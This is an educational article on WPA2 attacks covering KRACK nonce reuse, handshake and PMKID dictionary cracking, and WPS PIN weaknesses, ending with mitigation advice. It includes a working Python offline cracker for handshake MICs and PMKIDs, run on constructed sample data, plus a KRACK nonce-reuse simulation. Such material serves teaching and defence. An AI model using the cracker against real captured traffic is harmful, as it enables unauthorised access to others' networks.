For over a decade, WPA2-PSK was the gold standard for wireless security. However, the discovery of the Key Reinstallation Attack (KRACK) in 2017 revealed a fundamental flaw in how the 4-way handshake manages nonces: by replaying message 3 of the handshake, an attacker can force a client to reinstall an already-in-use key, which resets the packet number (nonce) and replay counter and leads to keystream reuse. This allows attackers to decrypt traffic without ever knowing the password.
Traditional WPA2 cracking relies on capturing the 4-way handshake (EAPOL-Key frames). Once the handshake is captured, an attacker can perform an offline dictionary attack against the Pairwise Master Key (PMK), which is derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 256-bit output). For each candidate passphrase the attacker derives the PMK, expands it into the Pairwise Transient Key (PTK) using the two nonces and two MAC addresses from the handshake, and recomputes the MIC on message 2 with the first 16 bytes of the PTK (the KCK); a matching MIC confirms the guess.
PMKID cracking is a significant evolution: the attacker sends an association request to the AP and captures the PMKID from the RSN information element of the first EAPOL-Key frame (message 1) the AP replies with, so no client needs to be connecting. PMKID is simply HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC), so it can be cracked offline exactly like a handshake MIC. The caveat is that the AP must include a PMKID in message 1, which most APs with roaming features enabled do.
The terminal output above shows the capture of a handshake. What the attacker holds is not a password hash as such, but everything needed to test candidates offline: the SSID (which acts as the PBKDF2 salt), both MAC addresses, both nonces and the MIC (or the PMKID). This material can be moved to a high-performance GPU cluster for cracking.
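The following example, added here and not part of the original page, implements both offline attacks described above (handshake MIC check and PMKID check) in plain Python using only the standard library. The "captured" handshake is constructed inline from an assumed SSID, MAC addresses, nonces and passphrase so the script runs offline; the wordlist is likewise constructed. Frame layout and key derivation follow IEEE 802.11i (PBKDF2 for the PMK, PRF-384 for the PTK, HMAC-SHA1 MIC for key descriptor version 2).

```python
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), i.e. first 16 bytes of the tag
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf_384(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 * 20 bytes >= 48 bytes of PTK
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]  # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    # The MIC field sits at offset 81..97: 4-byte 802.1X header + 77 bytes into the key descriptor.
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # Minimal EAPOL-Key message 2 (constructed; a real one also carries the RSN IE in key data).
    key_info = (0x010A).to_bytes(2, "big")  # version 2 (HMAC-SHA1), pairwise key, MIC bit set
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    eapol_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    # Offline dictionary attack: recompute the message-2 MIC for each candidate and compare.
    snonce = eapol_msg2[17:49]        # key nonce field
    captured_mic = eapol_msg2[81:97]  # key MIC field
    for candidate in wordlist:
        kck = prf_384(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def crack_pmkid(ssid: str, ap_mac: bytes, sta_mac: bytes, captured: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    # PMKID attack: no nonces or MIC needed, only the PMKID and the two MAC addresses.
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac), captured):
            return candidate
    return None


# Constructed sample data (assumed values, not a real capture).
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "sunshine2019"
WORDLIST = ["password", "12345678", "letmein1", "sunshine2019", "admin1234"]


def make_constructed_capture():
    # Plays the role of a legitimate client and AP so the cracker has something to attack.
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = prf_384(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    msg2 = build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))
    return msg2, pmkid(pmk, AP_MAC, STA_MAC)


if __name__ == "__main__":
    msg2, captured_pmkid = make_constructed_capture()
    print("handshake:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, msg2, WORDLIST))
    print("pmkid:    ", crack_pmkid(SSID, AP_MAC, STA_MAC, captured_pmkid, WORDLIST))
```

The cost of the attack is entirely in PBKDF2: 4096 HMAC-SHA1 rounds per candidate, which is why the workload moves to GPUs and why passphrase length, not cipher strength, decides the outcome. Note that the PMKID variant needs neither nonces nor a MIC, which is what makes the single-frame capture sufficient.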
KRACK does not recover the password; it breaks the encryption of an individual session by forcing the client to reuse a nonce with the same key. Any stream cipher reused with the same key and nonce leaks the XOR of the plaintexts, so with CCMP the attacker can decrypt and replay frames; with TKIP and GCMP the reinstallation additionally exposes the authentication key, allowing packets to be forged and injected.
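The following simulation, added here as an illustration and not taken from the original page or from the KRACK paper, shows why a reset nonce is fatal. A station object tracks its packet number, a key reinstallation resets it, and an attacker who knows one plaintext (for example a predictable DHCP or ARP frame) recovers the other. Since the standard library has no AES, an HMAC-SHA1 counter-mode keystream stands in for the AES-CTR half of CCMP; the nonce-reuse property it demonstrates is the same. All keys and frames are constructed.

```python
import hashlib
import hmac


def keystream(tk: bytes, nonce: bytes, length: int) -> bytes:
    # Stand-in for AES-CTR: keystream block i = HMAC-SHA1(TK, nonce || i). Reusing (TK, nonce)
    # reproduces the identical keystream, exactly as with the real cipher.
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(tk, nonce + ctr.to_bytes(2, "big"), hashlib.sha1).digest()
        ctr += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Station:
    """Client side of a CCMP session: the packet number (PN) is the per-frame nonce counter."""

    def __init__(self, tk: bytes):
        self.tk = tk
        self.pn = 0

    def install_key(self, tk: bytes) -> None:
        # Installing a key (re)initialises the PN. This is correct for a fresh key and
        # catastrophic when the "new" key is the one already in use: that is the KRACK bug.
        self.tk = tk
        self.pn = 0

    def encrypt(self, plaintext: bytes):
        self.pn += 1
        nonce = self.pn.to_bytes(6, "big")  # CCMP PN is 48 bits
        return nonce, xor(plaintext, keystream(self.tk, nonce, len(plaintext)))


def simulate_krack(tk: bytes, known_frame: bytes, secret_frame: bytes, replay_msg3: bool) -> bytes:
    """Returns what an attacker who knows `known_frame` can recover of `secret_frame`."""
    sta = Station(tk)
    sta.install_key(tk)                      # legitimate message 3: key installed, PN = 0
    _, c1 = sta.encrypt(known_frame)         # sent under PN = 1
    if replay_msg3:
        sta.install_key(tk)                  # attacker replays message 3: same TK, PN reset to 0
    _, c2 = sta.encrypt(secret_frame)        # PN = 1 again if reinstalled, PN = 2 otherwise
    # c1 ^ c2 = p1 ^ p2 when the keystreams coincide, so p2 = c1 ^ c2 ^ p1.
    return xor(xor(c1, c2), known_frame)


# Constructed sample data (assumed values).
TK = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
KNOWN = b"DHCPDISCOVER client-id=aa:bb:cc "
SECRET = b"GET /login?user=admin&pw=hunter2"

if __name__ == "__main__":
    print("with reinstall:   ", simulate_krack(TK, KNOWN, SECRET, replay_msg3=True))
    print("without reinstall:", simulate_krack(TK, KNOWN, SECRET, replay_msg3=False))
```

The defence on the client is simply to refuse to reinstall a key that is already installed (which is what the patches do), so that a replayed message 3 no longer touches the packet number.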
| Attack Vector | Target | Impact | Requirement |
|---|---|---|---|
| Dictionary Attack | PSK (via handshake MIC) | Full Password Recovery | Captured 4-way handshake (a client must connect or be deauthenticated) |
| KRACK | Handshake State | Decryption/Replay (Injection with TKIP/GCMP) | Channel-based MitM, unpatched client |
| PMKID Attack | PMKID in EAPOL message 1 (RSN IE) | Full Password Recovery | One frame from the AP, no client required |
To mitigate WPA2 flaws, administrators must ensure that all clients and access points are patched against KRACK (the AP side is affected where 802.11r fast roaming is enabled) and use long random passphrases (16+ characters) to render dictionary attacks computationally infeasible; note that a strong passphrase is the only defence against the handshake and PMKID attacks, since neither can be prevented at the AP. Where the client base supports it, migrating to WPA3-SAE removes the offline dictionary attack altogether.
WPS is a separate attack surface that bypasses passphrase strength entirely: the 8-digit PIN is validated in two halves, so an online brute force needs at most around 11,000 attempts, and the Pixie Dust weakness recovers the PIN offline on many chipsets; a recovered PIN hands over the WPA2 passphrase. Always disable WPS in the router administration panel.